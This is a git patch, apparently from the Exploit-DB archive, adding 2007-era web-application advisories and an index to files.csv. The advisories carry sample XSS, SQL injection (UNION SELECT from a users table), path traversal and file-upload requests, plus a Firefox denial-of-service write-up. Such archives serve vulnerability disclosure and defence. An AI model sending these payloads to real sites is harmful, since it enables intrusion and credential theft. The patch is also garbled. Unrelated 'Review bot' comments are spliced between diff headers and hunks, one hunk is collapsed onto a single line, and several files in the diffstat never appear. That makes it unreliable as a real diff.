From f14cd157526e87cd72465e6192e087b4abff22eb Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 6 Jan 2014 04:12:15 +0000
Subject: [PATCH] Updated 01_06_2014
---
files.csv | 18 ++++
platforms/asp/webapps/30696.txt | 7 ++
platforms/asp/webapps/30706.txt | 7 ++
platforms/asp/webapps/30708.txt | 9 ++
platforms/jsp/webapps/30704.txt | 7 ++
platforms/jsp/webapps/30705.txt | 5 +
platforms/multiple/dos/30702.html | 72 +++++++++++++
platforms/php/webapps/30691.txt | 8 ++
platforms/php/webapps/30693.txt | 9 ++
platforms/php/webapps/30694.txt | 7 ++
platforms/php/webapps/30695.txt | 10 ++
platforms/php/webapps/30697.txt | 7 ++
platforms/php/webapps/30698.txt | 35 +++++++
platforms/php/webapps/30699.txt | 9 ++
platforms/php/webapps/30700.txt | 9 ++
platforms/php/webapps/30701.txt | 10 ++
platforms/php/webapps/30703.txt | 9 ++
platforms/php/webapps/30707.txt | 9 ++
platforms/windows/remote/30692.js | 167 ++++++++++++++++++++++++++++++
19 files changed, 414 insertions(+)
create mode 100755 platforms/asp/webapps/30696.txt
create mode 100755 platforms/asp/webapps/30706.txt
create mode 100755 platforms/asp/webapps/30708.txt
create mode 100755 platforms/jsp/webapps/30704.txt
create mode 100755 platforms/jsp/webapps/30705.txt
create mode 100755 platforms/multiple/dos/30702.html
create mode 100755 platforms/php/webapps/30691.txt
create mode 100755 platforms/php/webapps/30693.txt
create mode 100755 platforms/php/webapps/30694.txt
create mode 100755 platforms/php/webapps/30695.txt
create mode 100755 platforms/php/webapps/30697.txt
create mode 100755 platforms/php/webapps/30698.txt
create mode 100755 platforms/php/webapps/30699.txt
create mode 100755 platforms/php/webapps/30700.txt
create mode 100755 platforms/php/webapps/30701.txt
create mode 100755 platforms/php/webapps/30703.txt
create mode 100755 platforms/php/webapps/30707.txt
create mode 100755 platforms/windows/remote/30692.js
diff --git a/files.csv b/files.csv
index 37a79bb1b..f816b2123 100755
--- a/files.csv
+++ b/files.csv 
@@ -27530,3 +27530,21 @@ id,file,description,date,author,platform,type,port
 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
+30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
+30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0
+30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
+30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.PHP Cross-Site Scripting Vulnerability",2007-10-19,"Ivan Sanchez",php,webapps,0
+30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.PHP Multiple Cross Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0
+30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting Vulnerability",2007-10-20,"Aria-Security Team",asp,webapps,0
+30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.PHP Local File Include Vulnerability",2007-10-20,sekuru,php,webapps,0
+30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module Unauthorized Access Vulnerability",2007-10-22,KiNgOfThEwOrLd,php,webapps,0
+30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.PHP Cross-Site Scripting Vulnerability",2007-10-22,Matrix86,php,webapps,0
+30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 Index.PHP SQL Injection Vulnerability",2007-10-22,"Aria-Security Team",php,webapps,0
+30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.PHP Local File Include Vulnerability",2007-10-22,hack2prison,php,webapps,0
+30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 Malformed XBL Constructor Remote Denial of Service Vulnerability",2007-10-22,"Soroush Dalili",multiple,dos,0
+30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload Vulnerability",2007-10-23,"Pete Houston",php,webapps,0
+30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0
+30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
+30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0
+30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0
+30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0
diff --git a/platforms/asp/webapps/30696.txt b/platforms/asp/webapps/30696.txt
new file mode 100755
index 000000000..4dc48c2d7
--- /dev/null
+++ b/platforms/asp/webapps/30696.txt
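Review bot: Row 30691 spells the vendor "Alacate-Lucent", so a search of files.csv for Alcatel-Lucent will miss the OmniVista 4760 entry; the description should start `"Alcatel-Lucent OmniVista 4760 ...`. Row 30695 gives the version as `rNote 0.9.7`, while the advisory added in platforms/php/webapps/30695.txt states that rNote 0.9.7.5 is vulnerable, so the index and the advisory should be made to agree. Row 30694 names the script `Lostpwd.PHP` although the advisory's URL uses `lostpwd.php`; keeping the file name in its real case would match what a defender sees in access logs.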
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26142/info
+
+SearchSimon Lite is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH
\ No newline at end of file
diff --git a/platforms/asp/webapps/30706.txt b/platforms/asp/webapps/30706.txt
new file mode 100755
index 000000000..78fb3705e
--- /dev/null
+++ b/platforms/asp/webapps/30706.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26193/info
+
+CodeWidgets Web Based Alpha Tabbed Address Book is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.asp?alpha=[SQL INJECTION]
\ No newline at end of file
diff --git a/platforms/asp/webapps/30708.txt b/platforms/asp/webapps/30708.txt
new file mode 100755
index 000000000..ebf602173
--- /dev/null
+++ b/platforms/asp/webapps/30708.txt
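Review bot: The header for 30696.txt reads `new file mode 100755`, which marks a plain-text advisory as executable; every other file created by this patch (the remaining .txt advisories, 30702.html and 30692.js) is listed with the same mode. Proof-of-concept material is safer stored as `new file mode 100644`, so that nothing in a checkout can be run by accident. On the last added line the sample host is `www.example`, where the other advisories use `www.example.com`; one placeholder form throughout keeps the entries easy to grep.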
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26207/info
+
+Aleris Web Publishing Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Aleris Web Publishing Server 3.0 is vulnerable; other versions may also be affected.
+
+www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users--
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30704.txt b/platforms/jsp/webapps/30704.txt
new file mode 100755
index 000000000..7c81a8bad
--- /dev/null
+++ b/platforms/jsp/webapps/30704.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26182/info
+
+GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process.
+
+http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name]
+
+http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js
diff --git a/platforms/jsp/webapps/30705.txt b/platforms/jsp/webapps/30705.txt
new file mode 100755
index 000000000..122468821
--- /dev/null
+++ b/platforms/jsp/webapps/30705.txt
@@ -0,0 +1,5 @@
+source: http://www.securityfocus.com/bid/26182/info
+
+GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process.
+
+http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx
\ No newline at end of file
diff --git a/platforms/multiple/dos/30702.html b/platforms/multiple/dos/30702.html
new file mode 100755
index 000000000..07f904d24
--- /dev/null
+++ b/platforms/multiple/dos/30702.html
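Review bot: The 30708.txt advisory never names the affected parameter; a reader can only infer from the sample request that `mode` on page.asp is the injection point. A line such as `The issue affects the 'mode' parameter of page.asp.` would tell defenders which input to validate and which requests to look for in logs. The sample request is also written without a scheme (`www.example.com/calendar/page.asp?...`), whereas the other advisories in this patch give full `http://` URLs.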
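Review bot: 30704.txt and 30705.txt carry the same one-sentence description and the same BID 26182 source, so neither file says which of the "multiple vulnerabilities" its URLs illustrate. files.csv describes 30704 as arbitrary file access through the `name` parameter of download.jsp and 30705 as a file upload through component/upload.jsp. Repeating that one line at the top of each advisory would make the entries self-contained for someone triaging a GHBoard install.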
@@ -0,0 +1,72 @@ +source: http://www.securityfocus.com/bid/26172/info + +Mozilla Firefox is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. + +Attackers can exploit this issue to cause denial-of-service conditions. + +Firefox 2.0.0.7 is vulnerable; other versions may also be affected. + +i######################### WwW.BugReport.ir ######################### +# +# AmnPardaz Security Research & Penetration Testing Group +# +# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service +# Vendor URL: www.mozilla.org +# Version: <= 2.0.0.7 +# Fix Available: Yes! +# Soloution: Update to 2.0.0.8 +# Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8! +# Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm +# +######################### WwW.AmnPardaz.com ######################## +# +# Leaders : Shahin Ramezany & Sorush Dalili +# Team Members: Amir Hossein Khonakdar, Hamid Farhadi +# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com +# Country: Iran +# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net +# Contacts: & +# +######################## Bug Description ########################### +# +# To do this work we need 2 files (Html,XML). +# Their codes was written below. +# +# Save below codes in a HTML file. +# +-------------------------------------------------------------------- +-------------------------------------------------------------------- + + + + + + Suddenly see you baby! If you see this bug execution was failed! + + + +-------------------------------------------------------------------- +-------------------------------------------------------------------- +# +# Save below codes in "moz.xml" file. 
+# +-------------------------------------------------------------------- +-------------------------------------------------------------------- + + + + + + + + +-------------------------------------------------------------------- +-------------------------------------------------------------------- +# +# Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source. +# +################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30691.txt b/platforms/php/webapps/30691.txt new file mode 100755 index 000000000..dc5f945be --- /dev/null +++ b/platforms/php/webapps/30691.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/26128/info + +OmniVista 4760 is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. + +http://www.somesite.com/?Langue="><" +http://www.somesite.com/php-bin/Webclient.php?action= \ No newline at end of file diff --git a/platforms/php/webapps/30693.txt b/platforms/php/webapps/30693.txt new file mode 100755 index 000000000..1daba8a4f --- /dev/null +++ b/platforms/php/webapps/30693.txt 
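Review bot: The opening banner line of 30702.html, `i######################### WwW.BugReport.ir ...`, starts with a stray `i` that the other banner lines do not have; dropping it restores the comment box. The file is stored with an .html extension but opens with the plain-text SecurityFocus summary and `#` comment lines, so it reads as an advisory rather than a page. A .txt extension, or a first line saying the file is a write-up, would match its content and make clear it is not meant to be opened in a browser.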
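Review bot: Both sample URLs in 30691.txt use `www.somesite.com`, which is not a reserved documentation domain, while the other advisories in this patch use `www.example.com`; switching the host to `www.example.com` avoids pointing readers at a host someone may actually own. The text also does not name the affected parameters, which can only be inferred from the URLs as `Langue` and `action`. One sentence listing them would tell an OmniVista 4760 administrator what to filter or monitor.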
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26136/info
+
+SocketKB is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect SocketKB 1.1.5; other versions may also be affected.
+
+http://www.example.com/[PATH]/?__f=article&art_id=###[XSS]&node=###[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30694.txt b/platforms/php/webapps/30694.txt
new file mode 100755
index 000000000..5b913bfe0
--- /dev/null
+++ b/platforms/php/webapps/30694.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26138/info
+
+SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/path/lostpwd.php?lost_id=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30695.txt b/platforms/php/webapps/30695.txt
new file mode 100755
index 000000000..86511b1c1
--- /dev/null
+++ b/platforms/php/webapps/30695.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26140/info
+
+rNote is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+rNote 0.9.7.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/rnote/rnote.php?d=alert("RxH")